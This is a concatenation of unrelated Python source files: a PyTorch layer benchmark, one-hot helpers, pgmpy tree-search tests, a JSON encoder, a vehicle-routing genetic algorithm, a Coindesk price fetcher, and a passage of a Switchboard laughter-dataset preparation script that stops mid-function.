h_res = max(1, int(random.gauss(h, h_var)))
w_res = max(1, int(random.gauss(w, w_var)))
input_i = torch.randn(c, h_res, w_res, device=device)
target_i = torch.randint(1, (h_res, w_res), dtype=torch.int64, device=device)
inputs.append(input_i)
targets.append(target_i)
if cuda:
# Synchronize copy operations so they don't influence the benchmark
torch.cuda.synchronize()
return inputs, targets
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument("-L", dest="layers", type=str, nargs="+")
parser.add_argument("-N", dest="N", type=int, nargs="+")
parser.add_argument("-C", dest="C", type=int, nargs="+")
parser.add_argument("-H", dest="H", type=int, nargs="+")
parser.add_argument("-W", dest="W", type=int, nargs="+")
parser.add_argument("-HV", dest="HV", type=float, nargs="+")
parser.add_argument("-WV", dest="WV", type=float, nargs="+")
parser.add_argument("-V", dest="V", type=float, nargs="+")
parser.add_argument("-S", dest="seed", type=int, nargs="+")
parser.add_argument("--warmup", dest="warmup", type=float, default=2.0)
parser.add_argument("--run-time", dest="run_time", type=float, default=5.0)
parser.add_argument("--verbose", dest="verbose", type=int, default=0)
parser.add_argument("--csv-log", dest="csv_log", type=str)
parser.add_argument("--cuda", dest="cuda", type=str, nargs="+", default=["False"])
    args = parser.parse_args(args)
for v in args.cuda:
if v not in ["False", "True"]:
raise ValueError("Argument --cuda may only be passed a list of True or False. Got {} instead.".format(args.cuda))
args.cuda = [True if c == "True" else False for c in args.cuda]
if args.V is not None:
        if (args.HV is not None or args.WV is not None):
            raise ValueError("If -V (shared variance for H and W) is given, -HV and -WV must not be set.")
args.HV = args.V
args.WV = args.V
if args.verbose > 0:
print("called with: ", args)
benchmark_obj = SegLayersBenchMark(args)
benchmark_obj.run()
if __name__ == "__main__":
main(sys.argv[1:])
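# Example invocation (illustrative; the script filename and parameter values are
# hypothetical). -S (seed), -N, -C, -H, -W and either -V or both -HV/-WV must be
# supplied because they are expanded with itertools.product above:
#
#     python segmentation_layers_benchmark.py \
#         -L relu_nt conv2d_nt_3x3 batch_norm_nt \
#         -N 8 -C 3 -H 64 -W 64 -V 8.0 -S 0 \
#         --cuda False --run-time 2.0 --csv-log results.csv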
|
412812
|
from typing import Optional
import numpy as np
import torch
def torch_one_hot(target: torch.Tensor, num_classes: Optional[int] = None) -> torch.Tensor:
"""
Compute one hot encoding of input tensor
Args:
target: tensor to be converted
num_classes: number of classes. If :attr:`num_classes` is None,
the maximum of target is used
Returns:
torch.Tensor: one hot encoded tensor
"""
if num_classes is None:
num_classes = int(target.max().detach().item() + 1)
dtype, device = target.dtype, target.device
target_onehot = torch.zeros(*target.shape, num_classes, dtype=dtype, device=device)
return target_onehot.scatter_(1, target.unsqueeze_(1), 1.0)
def np_one_hot(target: np.ndarray, num_classes: Optional[int] = None) -> np.ndarray:
"""
Compute one hot encoding of input array
Args:
target: array to be converted
num_classes: number of classes
Returns:
numpy.ndarray: one hot encoded array
"""
if num_classes is None:
num_classes = int(target.max().item() + 1)
dtype = target.dtype
target_onehot = np.zeros((*target.shape, num_classes), dtype=dtype)
for c in range(num_classes):
target_onehot[..., c] = target == c
return target_onehot
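# A minimal, self-contained usage sketch (added for illustration; not part of the
# original module). Both helpers expect integer class labels.
if __name__ == "__main__":
    labels = np.array([0, 2, 1])
    print(np_one_hot(labels, num_classes=3))
    # [[1 0 0]
    #  [0 0 1]
    #  [0 1 0]]
    print(torch_one_hot(torch.tensor([0, 2, 1]), num_classes=3))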
|
412845
|
import unittest
import numpy as np
import pandas as pd
import networkx as nx
from pgmpy.models import BayesianNetwork
from pgmpy.estimators import TreeSearch
from pgmpy.factors.discrete import TabularCPD
from pgmpy.sampling import BayesianModelSampling
class TestTreeSearch(unittest.TestCase):
def setUp(self):
# set random seed
np.random.seed(0)
# test data for chow-liu
self.data12 = pd.DataFrame(
np.random.randint(low=0, high=2, size=(100, 5)),
columns=["A", "B", "C", "D", "E"],
)
# test data for chow-liu
model = BayesianNetwork(
[("A", "B"), ("A", "C"), ("B", "D"), ("B", "E"), ("C", "F")]
)
cpd_a = TabularCPD("A", 2, [[0.4], [0.6]])
cpd_b = TabularCPD(
"B",
3,
[[0.6, 0.2], [0.3, 0.5], [0.1, 0.3]],
evidence=["A"],
evidence_card=[2],
)
cpd_c = TabularCPD(
"C", 2, [[0.3, 0.4], [0.7, 0.6]], evidence=["A"], evidence_card=[2]
)
cpd_d = TabularCPD(
"D",
3,
[[0.5, 0.3, 0.1], [0.4, 0.4, 0.8], [0.1, 0.3, 0.1]],
evidence=["B"],
evidence_card=[3],
)
cpd_e = TabularCPD(
"E",
2,
[[0.3, 0.5, 0.2], [0.7, 0.5, 0.8]],
evidence=["B"],
evidence_card=[3],
)
cpd_f = TabularCPD(
"F",
3,
[[0.3, 0.6], [0.5, 0.2], [0.2, 0.2]],
evidence=["C"],
evidence_card=[2],
)
model.add_cpds(cpd_a, cpd_b, cpd_c, cpd_d, cpd_e, cpd_f)
inference = BayesianModelSampling(model)
self.data13 = inference.forward_sample(size=10000)
# test data for TAN
model = BayesianNetwork(
[
("A", "R"),
("A", "B"),
("A", "C"),
("A", "D"),
("A", "E"),
("R", "B"),
("R", "C"),
("R", "D"),
("R", "E"),
]
)
cpd_a = TabularCPD("A", 2, [[0.7], [0.3]])
cpd_r = TabularCPD(
"R",
3,
[[0.6, 0.2], [0.3, 0.5], [0.1, 0.3]],
evidence=["A"],
evidence_card=[2],
)
cpd_b = TabularCPD(
"B",
3,
[
[0.1, 0.1, 0.2, 0.2, 0.7, 0.1],
[0.1, 0.3, 0.1, 0.2, 0.1, 0.2],
[0.8, 0.6, 0.7, 0.6, 0.2, 0.7],
],
evidence=["A", "R"],
evidence_card=[2, 3],
)
cpd_c = TabularCPD(
"C",
2,
[[0.7, 0.2, 0.2, 0.5, 0.1, 0.3], [0.3, 0.8, 0.8, 0.5, 0.9, 0.7]],
evidence=["A", "R"],
evidence_card=[2, 3],
)
cpd_d = TabularCPD(
"D",
3,
[
[0.3, 0.8, 0.2, 0.8, 0.4, 0.7],
[0.4, 0.1, 0.4, 0.1, 0.1, 0.1],
[0.3, 0.1, 0.4, 0.1, 0.5, 0.2],
],
evidence=["A", "R"],
evidence_card=[2, 3],
)
cpd_e = TabularCPD(
"E",
2,
[[0.5, 0.6, 0.6, 0.5, 0.5, 0.4], [0.5, 0.4, 0.4, 0.5, 0.5, 0.6]],
evidence=["A", "R"],
evidence_card=[2, 3],
)
model.add_cpds(cpd_a, cpd_r, cpd_b, cpd_c, cpd_d, cpd_e)
inference = BayesianModelSampling(model)
self.data22 = inference.forward_sample(size=10000)
def test_estimate_chow_liu(self):
# learn tree structure using D as root node
for weight_fn in [
"mutual_info",
"adjusted_mutual_info",
"normalized_mutual_info",
]:
for n_jobs in [-1, 1]:
# learn graph structure
est = TreeSearch(self.data12, root_node="A", n_jobs=n_jobs)
dag = est.estimate(estimator_type="chow-liu", edge_weights_fn=weight_fn)
# check number of nodes and edges are as expected
self.assertCountEqual(dag.nodes(), ["A", "B", "C", "D", "E"])
self.assertTrue(nx.is_tree(dag))
# learn tree structure using A as root node
est = TreeSearch(self.data13, root_node="A", n_jobs=n_jobs)
dag = est.estimate(estimator_type="chow-liu", edge_weights_fn=weight_fn)
# check number of nodes and edges are as expected
self.assertCountEqual(dag.nodes(), ["A", "B", "C", "D", "E", "F"])
self.assertCountEqual(
dag.edges(),
[("A", "B"), ("A", "C"), ("B", "D"), ("B", "E"), ("C", "F")],
)
# check tree structure exists
self.assertTrue(dag.has_edge("A", "B"))
self.assertTrue(dag.has_edge("A", "C"))
self.assertTrue(dag.has_edge("B", "D"))
self.assertTrue(dag.has_edge("B", "E"))
self.assertTrue(dag.has_edge("C", "F"))
def test_estimate_tan(self):
for weight_fn in [
"mutual_info",
"adjusted_mutual_info",
"normalized_mutual_info",
]:
for n_jobs in [-1, 1]:
# learn graph structure
est = TreeSearch(self.data22, root_node="R", n_jobs=n_jobs)
dag = est.estimate(
estimator_type="tan", class_node="A", edge_weights_fn=weight_fn
)
# check number of nodes and edges are as expected
self.assertCountEqual(dag.nodes(), ["A", "B", "C", "D", "E", "R"])
self.assertCountEqual(
dag.edges(),
[
("A", "B"),
("A", "C"),
("A", "D"),
("A", "E"),
("A", "R"),
("R", "B"),
("R", "C"),
("R", "D"),
("R", "E"),
],
)
# check directed edge between class and independent variables
self.assertTrue(dag.has_edge("A", "B"))
self.assertTrue(dag.has_edge("A", "C"))
self.assertTrue(dag.has_edge("A", "D"))
self.assertTrue(dag.has_edge("A", "E"))
# check tree structure exists over independent variables
self.assertTrue(dag.has_edge("R", "B"))
self.assertTrue(dag.has_edge("R", "C"))
self.assertTrue(dag.has_edge("R", "D"))
self.assertTrue(dag.has_edge("R", "E"))
def test_estimate_chow_liu_auto_root_node(self):
# learn tree structure using auto root node
est = TreeSearch(self.data12)
# root node selection
weights = est._get_weights(self.data12)
sum_weights = weights.sum(axis=0)
maxw_idx = np.argsort(sum_weights)[::-1]
root_node = self.data12.columns[maxw_idx[0]]
dag = est.estimate(estimator_type="chow-liu")
nodes = list(dag.nodes())
np.testing.assert_equal(nodes[0], root_node)
np.testing.assert_array_equal(nodes, ["D", "A", "C", "B", "E"])
def test_estimate_tan_auto_class_node(self):
# learn tree structure using auto root and class node
est = TreeSearch(self.data22)
# root and class node selection
weights = est._get_weights(self.data22)
sum_weights = weights.sum(axis=0)
maxw_idx = np.argsort(sum_weights)[::-1]
root_node = self.data22.columns[maxw_idx[0]]
class_node = self.data22.columns[maxw_idx[1]]
dag = est.estimate(estimator_type="tan")
nodes = list(dag.nodes())
self.assertEqual(nodes[0], root_node)
self.assertEqual(nodes[-1], class_node)
self.assertEqual(sorted(nodes), sorted(["C", "R", "A", "D", "E", "B"]))
def tearDown(self):
del self.data12
del self.data22
|
412878
|
import base64
import json
from datetime import datetime
from bs4 import Tag
from pymonad.maybe import Maybe
from dataclasses import is_dataclass
from .log import get_logger
from .types import House
json_d = json.JSONEncoder.default
log = get_logger(__file__)
class AusBillsJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Maybe):
return {"$nothing": None} if \
obj.is_nothing() else {"$just": obj.value}
if isinstance(obj, Tag):
return {"$bs4.tag": obj.encode()}
if isinstance(obj, bytes):
return {"$bytes": base64.encodebytes(obj).decode()}
if is_dataclass(obj):
return dict(**obj.__dict__)
if isinstance(obj, House):
return {"$house": obj.value}
if isinstance(obj, datetime):
return {"$dateIso8601": obj.isoformat()}
log.warning("Got something of unexpected type"
"({}\n\nObj: {}\n\ndir: {}"
.format(type(obj), str(obj), dir(obj)))
return json_d(self, obj)
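# Illustrative usage (not part of the original module):
#     json.dumps({"scraped_at": datetime(2021, 1, 1)}, cls=AusBillsJsonEncoder)
#     -> '{"scraped_at": {"$dateIso8601": "2021-01-01T00:00:00"}}'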
|
412884
|
from utils.population import Population
from utils.customer import Customer
from utils.depot import Depot
from utils.chromosome import Chromosome
import math
import random
from copy import deepcopy
import numpy as np
from typing import List
def euclidean_distance(source: Customer, target) -> float:
"""
Computes the Euclidean Distance between two (x, y) coordinates
:param source: An instance of `Customer` or `Depot` class
:param target: An instance of `Customer` or `Depot` class
:return: A float number
"""
return math.sqrt(math.pow(source.x - target.x, 2) + math.pow(source.y - target.y, 2))
def initial_routing(depot: Depot) -> None:
"""
    Adds `Customer`s sequentially to the `Depot` until the accumulated `weight` of `Customer`s surpasses
    the `Depot`'s maximum `capacity`.
    Note: The `Customer`s between two `separator` `Customer`s constitute a route to be served by one vehicle.
:param depot: An instance of `Depot` class
:return: None
"""
accumulated_weight = 0
separator = Customer(999, depot.x, depot.y, 0, True)
i = 0
while i < depot.len():
if accumulated_weight + depot[i].cost > depot.capacity:
depot.insert(i, separator)
accumulated_weight = 0
i += 1
accumulated_weight += depot[i].cost
i += 1
if not depot[-1].null:
depot.add(separator)
def initialize_routing(instance) -> None:
"""
    Adds `Customer`s sequentially to the `Depot` until the accumulated `weight` of `Customer`s surpasses
    the `Depot`'s maximum `capacity`.
    Note: The `Customer`s between two `separator` `Customer`s constitute a route to be served by one vehicle.
:param instance: An instance of `Depot`, 'Chromosome' or 'Population'
:return: None
"""
if instance.__class__.__name__.__contains__('Population'):
for ch in instance:
for d in ch:
initial_routing(d)
elif instance.__class__.__name__.__contains__('Chromosome'):
for d in instance:
initial_routing(d)
else:
initial_routing(instance)
# aliased in C# as "RandomList"
def randomize_customers(chromosome: Chromosome) -> None:
"""
    Randomizes all customers in all `Depot`s of the given `Chromosome`, a.k.a. shuffling.
    We use this method to build the initial population using random `Chromosome`s.
:param chromosome: An instance of `Chromosome` class.
:return: None
"""
for d in chromosome:
random.shuffle(d.depot_customers)
def clone(chromosome: Chromosome) -> Chromosome:
"""
Clones a Chromosome with all same characteristics
:param chromosome: An instance of `Chromosome` class to be cloned
:return: A cloned `Chromosome`
"""
return deepcopy(chromosome)
# aka TournamentPopulation
def extract_population(population: Population, size: int) -> Population:
"""
    Creates a shallow `Population` object with the size of `size`.
:param population: An instance of `Population` class
:param size: The result `Population` size.
:return: A `Population` class
"""
indices = random.sample(range(0, population.len()), size)
new_population = Population(id=0)
for i in indices:
new_population.add(population[i])
return new_population
def fittest_chromosome(population: Population) -> Chromosome:
"""
Returns the `Chromosome` with maximum `fitness_value` within whole `Population`
:param population: An instance of `Population` class
:return: A single `Chromosome`
"""
return max(population, key=lambda chromosome: chromosome.fitness_value())
def tournament(population: Population, tournament_probability: float = 0.8, size: int = 2) -> Population:
"""
    Selects TWO parents to send to the `crossover` step, based on the `tournament` approach.
    Tournament approach:
    1. Select a random unique sample from the population
    2. Draw a random number; if it is below the `tournament_probability` hyper-parameter do 3, else do 5
    3. Select another random unique sample from the population
    4. Find the fittest chromosome from each sampled population and return the pair as a new population.
    5. Randomly choose two chromosomes and return them as a new population.
    Note: if the two samples are the same, the fittest `Chromosome` of both samples will be the same. Since we
    pass the result of `tournament` to `cross_over`, the cross-over operation then becomes asexual (single-parent).
:param population: An instance of `Population` class
:param tournament_probability: The probability of using fittest or random sample (=0.8)
:param size: The size of population to be sampled. By default, we use Binary tournament.
:return: A `Population` with size of `size`
"""
    # we create new objects so that asexual (single-parent) cross-over can work too (all methods pass by reference)
first_fittest = Chromosome(7770, -1)
second_fittest = Chromosome(7771, -1)
first_sample = extract_population(population, size)
if random.random() <= tournament_probability:
second_sample = extract_population(population, size)
first = fittest_chromosome(first_sample)
second = fittest_chromosome(second_sample)
for new, found in zip([first_fittest, second_fittest], [first, second]):
new.chromosome = found.get_all()
new.id = found.id
new.fitness = found.fitness
new.capacity = found.capacity
new.size = found.size
return Population(0, [first_fittest, second_fittest])
else:
indices = random.sample(range(0, first_sample.len()), 2)
first = first_sample[indices[0]]
second = first_sample[indices[1]]
for new, found in zip([first_fittest, second_fittest], [first, second]):
new.chromosome = found.get_all()
new.id = found.id
new.fitness = found.fitness
new.capacity = found.capacity
new.size = found.size
return Population(0, [first_fittest, second_fittest])
def extract_random_route(chromosome: Chromosome, delete=True) -> (List[Customer], int, int, int):
"""
    Extracts a random route from a random `Depot` in the given `Chromosome`.
    Note: A route is defined by the `Customer`s between two `null` `Customer`s.
    :param chromosome: A `Chromosome` to be searched for a route
    :param delete: Whether to delete the extracted route from the `Chromosome` or not.
    :return: A tuple of (List of `Customer`s, depot index, route start index, route end index)
"""
rand_depot_index = random.randint(0, chromosome.len() - 1)
rand_depot: Depot = chromosome[rand_depot_index]
rand_route_idx = random.randint(0, rand_depot.route_ending_index().__len__() - 1)
rand_route_end_idx = rand_depot.route_ending_index()[rand_route_idx]
if rand_route_idx == 0:
rand_route_start_idx = 0
route = rand_depot[rand_route_start_idx: rand_route_end_idx + 1]
if delete:
            for c in reversed(route):  # use `reversed` or we lose the `null customer` index
rand_depot.remove(c)
return route, rand_depot_index, rand_route_start_idx, rand_route_end_idx
else:
rand_route_start_idx = rand_depot.route_ending_index()[rand_route_idx - 1]
route = rand_depot[rand_route_start_idx + 1: rand_route_end_idx + 1]
if delete:
            for c in reversed(route):  # use `reversed` or we lose the `null customer` index
rand_depot.remove(c)
return route, rand_depot_index, rand_route_start_idx, rand_route_end_idx
def extract_route_from_depot(depot: Depot, route_idx: int, return_separator=False) -> (List[Customer], int, int):
"""
Extracts a route with respect to the `route_idx` from the given `Depot`.
    Note: A route is defined by the `Customer`s between two `null` `Customer`s.
    :param depot: A `Depot` to be searched
    :param route_idx: An int number representing the n'th route in `Depot`
    :param return_separator: Whether to return the trailing `null` `Customer` at the end of the route or not.
:return: A tuple of (`List` of `Customer`s, route_start_idx, route_end_idx).
"""
if route_idx >= depot.route_ending_index().__len__():
        raise Exception('There is no route with index "{}"; try values in [0, {}] for "route_idx".'
                        .format(route_idx, len(depot.route_ending_index()) - 1))
route_end_idx = depot.route_ending_index()[route_idx]
if route_idx == 0:
route_start_idx = 0
if return_separator:
route = depot[route_start_idx: route_end_idx + 1]
return route, route_start_idx, route_end_idx + 1
route = depot[route_start_idx: route_end_idx]
return route, route_start_idx, route_end_idx
else:
route_start_idx = depot.route_ending_index()[route_idx - 1]
if return_separator:
route = depot[route_start_idx + 1: route_end_idx + 1]
return route, route_start_idx + 1, route_end_idx + 1
route = depot[route_start_idx + 1: route_end_idx]
return route, route_start_idx + 1, route_end_idx
def insert_customer(customer: Customer, chromosome: Chromosome) -> (int, int):
"""
    Inserts a `Customer` (e.g. one taken from a randomly removed route) at an optimal place in the `Chromosome`.
    The optimal place is found using the following steps:
    1. Find the nearest `Depot` to the given `Customer` using the `euclidean_distance` function.
    2. Calculate the `cost` and `distance` between all members of all routes of the chosen `Depot` from the previous
    step.
    3. For each route in the selected `Depot`, compute the total distance that would result from inserting the
    `Customer` at every possible position, and pick the route and position with minimum distance, subject to the
    `Depot`'s capacity constraint.
    4. Finally, return the index of the `Depot` and the position at which the `Customer` has been inserted.
:param customer: A `Customer` to be inserted in `Chromosome`
:param chromosome: An instance of `Chromosome` class
:return: A tuple of (the `Depot` index, insert index)
"""
nearest_depot_index = int(np.argmin([euclidean_distance(customer, d) for d in chromosome]))
nearest_depot = chromosome[nearest_depot_index]
distances = []
costs = []
min_distance = 99999999 # +inf
insert_index = -1
route_index = -1
depot_temp = Customer(-1, nearest_depot.x, nearest_depot.y, 0, False) # to calculate distance between depot
# and customers and will be removed after inserting new `Customer`
for i in range(nearest_depot.routes_ending_indices.__len__()):
route, _, _ = extract_route_from_depot(nearest_depot, i, False)
route.insert(0, depot_temp)
distances.append(sum([euclidean_distance(route[i - 1], route[i]) for i, _ in enumerate(route)]))
costs.append(sum([c.cost for c in route]))
if customer.cost + costs[i] <= nearest_depot.capacity:
for ci in range(route.__len__()):
t1 = euclidean_distance(route[ci], route[(ci + 1) % route.__len__()])
t2 = euclidean_distance(route[ci], customer) + euclidean_distance(customer,
route[(ci + 1) % route.__len__()])
t3 = distances[i] - t1 + t2
if min_distance > t3:
min_distance = t3
route_index = i
insert_index = ci
route.remove(depot_temp)
if route_index > 0:
insert_index += nearest_depot.route_ending_index()[route_index - 1] + 1
if route_index == -1:
separator = Customer(9999, nearest_depot.x, nearest_depot.y, 0, True)
nearest_depot.add(customer)
nearest_depot.add(separator)
insert_index = nearest_depot.len() - 2
else:
nearest_depot.insert(insert_index, customer)
return nearest_depot_index, insert_index
def cross_over(parents: Population) -> (Population, List[Customer], List[Customer]):
"""
    Gets a `Population` instance consisting of two `Chromosome`s and applies cross-over on the parents based on the
    following steps:
    1. A random route is selected and removed from each of the two `Chromosome`s
    using the `extract_random_route` function (both extraction and deletion are done by this function).
    2. The randomly chosen route's `Customer`s from parent "1" are added to the "second" parent using the
    `insert_customer` function, and the randomly chosen route's `Customer`s from parent "2" are added
    to the "first" parent using the same function.
:param parents: An instance of `Population` class with "two" `Chromosome`s
:return: A `Population` class with "two" `Chromosome`s which has been obtained after cross-over.
"""
first_parent, second_parent = parents[0], parents[1]
first_route = extract_random_route(first_parent, True)[0][:-1]
second_route = extract_random_route(second_parent, True)[0][:-1]
for c in first_route:
insert_customer(c, second_parent)
for c in second_route:
insert_customer(c, first_parent)
crossed_parents = Population(6969, [first_parent, second_parent])
return crossed_parents, first_route, second_route
def generate_chromosome_sample(depots: List[Depot], customers: List[Customer], out: Chromosome = None) -> Chromosome:
"""
Gets a list of `Depot`s and `Customer`s and creates a new `Chromosome` regarding these information.
    Note: the input `Depot`s are empty (they contain no `Customer`s), so to fill them,
    we assign each `Customer` to its NEAREST `Depot` based on the `euclidean_distance` metric.
:param depots: A list of empty `Depot`s
:param customers: A list of `Customer`s to be distributed between `Depot`s in the final `Chromosome`
:param out: A `Chromosome` type object to be used instead of creating new instance. (All values will be overridden)
:return: A filled `Chromosome`
"""
if out is None:
out = Chromosome(1001, depots[0].capacity, -1, depots)
for c in customers:
depots[int(np.argmin([euclidean_distance(c, d) for d in depots]))].add(c)
return out
def generate_initial_population(sample: Chromosome, size: int) -> Population:
"""
    This method generates an instance of the `Population` class with size `size`, filled with clones of the `sample`
    `Chromosome`. In other words, the resulting `Population` consists of cloned `Chromosome`s.
:param sample: A `Chromosome` to be cloned and disseminated in search area
:param size: The size of the `Population`
:return: A `Population` instance
"""
chromosomes = [clone(sample) for i in range(size)]
for ch in chromosomes:
initialize_routing(ch)
randomize_customers(ch)
population = Population(-6, chromosomes)
return population
def generate_new_population(population: Population):
"""
    Generates a new `Population` by crossing over the winners of the tournament algorithm over the whole input `Population`.
    Note: We always keep the fittest for the next generation; if this causes a size mismatch, we remove the latest new `Chromosome`.
:param population: An initialized instance of`Population`
:return: An evolved instance `Population`
"""
new_population = Population(123, [fittest_chromosome(population)])
while new_population.len() < population.len():
crossed_parents = cross_over(tournament(population, 0.8, population.len()))
for ch in crossed_parents:
new_population.add(ch)
if new_population.len() > population.len():
new_population.remove_at(-1)
return new_population
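# Illustrative end-to-end sketch (hypothetical; `depots` and `customers` would come
# from the problem-instance parser, which is outside this module):
#
#     sample = generate_chromosome_sample(depots, customers)
#     population = generate_initial_population(sample, size=50)
#     for _ in range(100):
#         population = generate_new_population(population)
#     best = fittest_chromosome(population)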
|
412904
|
import requests
from . import FeedSource, _request_headers
class Coindesk(FeedSource):
def _fetch(self):
feed = {}
url = "https://api.coindesk.com/v1/bpi/currentprice/{base}.json"
for base in self.bases:
for quote in self.quotes:
if quote != 'BTC':
                    raise Exception('Coindesk FeedSource only handles BTC quotes.')
response = requests.get(url=url.format(
base=base
), headers=_request_headers, timeout=self.timeout)
result = response.json()
self.add_rate(feed, base, quote, float(result['bpi'][base]['rate_float']), 1.0)
return feed
|
412952
|
import sys, time, librosa, os, argparse, pickle, numpy as np
sys.path.append('../')
sys.path.append('../utils/')
import dataset_utils, audio_utils, data_loaders
sys.path.append('./Evaluation')
from eval_utils import *
import warnings
warnings.simplefilter("ignore")
from tqdm import tqdm
import pandas as pd
from joblib import Parallel, delayed
from sklearn.utils import shuffle
MIN_GAP=0. # Only use if we want to enforce gap between annotations
# Load Switchboard data
t_root = '../data/switchboard/switchboard-1/swb_ms98_transcriptions/'
a_root = '../data/switchboard/switchboard-1/97S62/'
all_audio_files = librosa.util.find_files(a_root,ext='sph')
train_folders, val_folders, test_folders = dataset_utils.get_train_val_test_folders(t_root)
train_transcription_files_A, train_audio_files = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(train_folders, 'A'), all_audio_files)
train_transcription_files_B, _ = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(train_folders, 'B'), all_audio_files)
val_transcription_files_A, val_audio_files = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(val_folders, 'A'), all_audio_files)
val_transcription_files_B, _ = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(val_folders, 'B'), all_audio_files)
test_transcription_files_A, test_audio_files = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(test_folders, 'A'), all_audio_files)
test_transcription_files_B, _ = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(test_folders, 'B'), all_audio_files)
# Get stats on the Laughter/Non-Laughter classes in the Audioset Annotations
# So that we can use these stats to resample from the switchboard test set
# Sample the Switchboard test data to be roughly proportional to what we have from the Audioset annotations
# in terms of class balance (~39.3% laughter)
# Do this by extending the audio files in each direction for the annotated laughter
audioset_annotations_df = pd.read_csv('../data/audioset/annotations/clean_laughter_annotations.csv')
print("\nAudioset Annotations stats:")
total_audioset_minutes, total_audioset_laughter_minutes, total_audioset_non_laughter_minutes, audioset_laughter_fraction, audioset_laughter_count = get_annotation_stats(audioset_annotations_df, display=True, min_gap = MIN_GAP, avoid_edges=True, edge_gap=0.5)
import torch
from torch import optim, nn
class AllocationModel(nn.Module):
def __init__(self, total_time, available_time_per_clip):
super().__init__()
self.total_time = total_time
self.available_time_per_clip = available_time_per_clip
self.allocated_times = nn.Parameter(torch.zeros(len(available_time_per_clip)), requires_grad=True)
def forward(self):
total_time_used = torch.sum(self.allocated_times)
leftover_times = self.available_time_per_clip - self.allocated_times
total_time_loss = torch.abs(self.total_time - total_time_used)
min_time = torch.min(leftover_times)
leftover_loss = 1/(min_time)
loss = total_time_loss + leftover_loss
self.allocated_times.data = torch.clamp(self.allocated_times, 0)
self.allocated_times.data = torch.min(self.allocated_times, self.available_time_per_clip)
return loss, self.allocated_times
def distribute_time(total_time, available_time_per_clip):
am = AllocationModel(torch.tensor(total_time), torch.tensor(available_time_per_clip))
optimizer = optim.Adam(am.parameters(),lr=0.1)
for i in range(300):
optimizer.zero_grad()
loss, times = am()
loss.backward(retain_graph=True)
optimizer.step()
am.zero_grad()
#import pdb; pdb.set_trace()
times = torch.clamp(times, 0)
return np.nan_to_num(times.detach().cpu().numpy())
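# Illustrative call (not part of the original script): ask the optimizer to trim a
# total of 3 seconds across three clips that each have 2 seconds of buffer; it tends
# to spread the reduction roughly evenly, i.e. approximately [1.0, 1.0, 1.0]:
#     distribute_time(3.0, [2.0, 2.0, 2.0])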
def get_10_second_clips(regions_list, audio_file_path, full_audio_file_length,
index, audioset_laughter_fraction, adjustment_amount=0):
if len(regions_list) == 0:
return [],[],0,0
# First pass to find clips
all_clips = []
current_start = None; current_end = None
for i in range(len(regions_list)):
if current_start is None:
current_start = regions_list[i][0]
beginning_space = current_start
if regions_list[i][0] + regions_list[i][1] > current_start + 10:
all_clips.append({'window': [current_start, current_end],
'beginning_buffer':0., 'end_buffer':0.,
'beginning_space': beginning_space})
current_start = regions_list[i][0]
beginning_space = current_start - current_end # new start point to old end point
current_end = regions_list[i][0] + regions_list[i][1]
if current_start is not None and current_end is not None:
end_space = full_audio_file_length - current_end
all_clips.append({'window': [current_start, current_end],
'beginning_buffer':0., 'end_buffer':0.,
'beginning_space': beginning_space,
'end_space': end_space})
for i, clip in enumerate(all_clips):
if 'end_space' not in clip: clip['end_space'] = all_clips[i+1]['beginning_space']
#clip_len = clip['window'][1] - clip['window'][0]
# 2nd pass: Go through, extending by 0.5 secs on each side unless it exceeds 10 seconds
for i, clip in enumerate(all_clips):
start, end = clip['window']
length = end-start
# Try adding 0.5s to begin and end, if not possible, print and give up
time_to_add_per_side = 0.5
# Try adding to beginning and end
if time_to_add_per_side < clip['beginning_space'] and time_to_add_per_side < clip['end_space']:
clip['window'] = [start-time_to_add_per_side, end + time_to_add_per_side]
clip['beginning_space'] -= time_to_add_per_side; clip['end_space'] -= time_to_add_per_side
clip['beginning_buffer'] += 0.5; clip['end_buffer'] += 0.5
if i > 0:
all_clips[i-1]['end_space'] -= time_to_add_per_side
if i < len(all_clips) - 1:
all_clips[i+1]['beginning_space'] -= time_to_add_per_side
# 3rd pass: Go back through, centering and extending windows out to 10s
for i, clip in enumerate(all_clips):
start, end = clip['window']
length = end-start
# Try adding equally to begin and end, if not possible, try one side, if not possible, print and give up
time_to_add = np.maximum(10 - length, 0) # If longer than 10 secs, don't shorten it, just leave it
time_to_add_per_side = time_to_add / 2
# Try adding to beginning and end
if time_to_add_per_side < clip['beginning_space'] and time_to_add_per_side < clip['end_space']:
clip['window'] = [start-time_to_add_per_side, end + time_to_add_per_side]
clip['beginning_space'] -= time_to_add_per_side; clip['end_space'] -= time_to_add_per_side
clip['beginning_buffer'] += time_to_add_per_side; clip['end_buffer'] += time_to_add_per_side
if i > 0:
all_clips[i-1]['end_space'] -= time_to_add_per_side
if i < len(all_clips) - 1:
all_clips[i+1]['beginning_space'] -= time_to_add_per_side
elif time_to_add < clip['beginning_space']:
clip['window'] = [start-time_to_add, end]
clip['beginning_buffer'] += time_to_add
if i > 0:
all_clips[i-1]['end_space'] -= time_to_add
elif time_to_add < clip['end_space']:
clip['window'] = [start, end+time_to_add]
clip['end_buffer'] += time_to_add
if i < len(all_clips) - 1:
all_clips[i+1]['beginning_space'] -= time_to_add
else:
pass
if clip['beginning_buffer'] < 0 and clip['beginning_buffer'] > -0.1: clip['beginning_buffer']=0.
if clip['end_buffer'] < 0 and clip['end_buffer'] > -0.1: clip['end_buffer']=0.
# 4th pass: Compute the class-balance (laughter fraction) for this conversation
total_window_time = sum([clip['window'][1] - clip['window'][0] for clip in all_clips])
total_laughter_time = sum([region[1] for region in regions_list])
swb_laughter_fraction = total_laughter_time / total_window_time
# Tweak this adjustment_amount to find a value for which after everything
# The class balances match
intended_window_time = total_laughter_time/(audioset_laughter_fraction) + adjustment_amount
# 5th pass: Trim back the clips to match the class-balance distribution of the Audioset Annotations
# Need to reduce the windows to cut 'total_window_time' down to 'intended_window_time'
# Try to distribute the time so that all windows are close to the same size
time_to_reduce = total_window_time - intended_window_time
#available_time_per_clip = [clip['beginning_buffer']+clip['end_buffer'] for clip in clips]
beginning_buffers = [clip['beginning_buffer'] for clip in all_clips]
end_buffers = [clip['end_buffer'] for clip in all_clips]
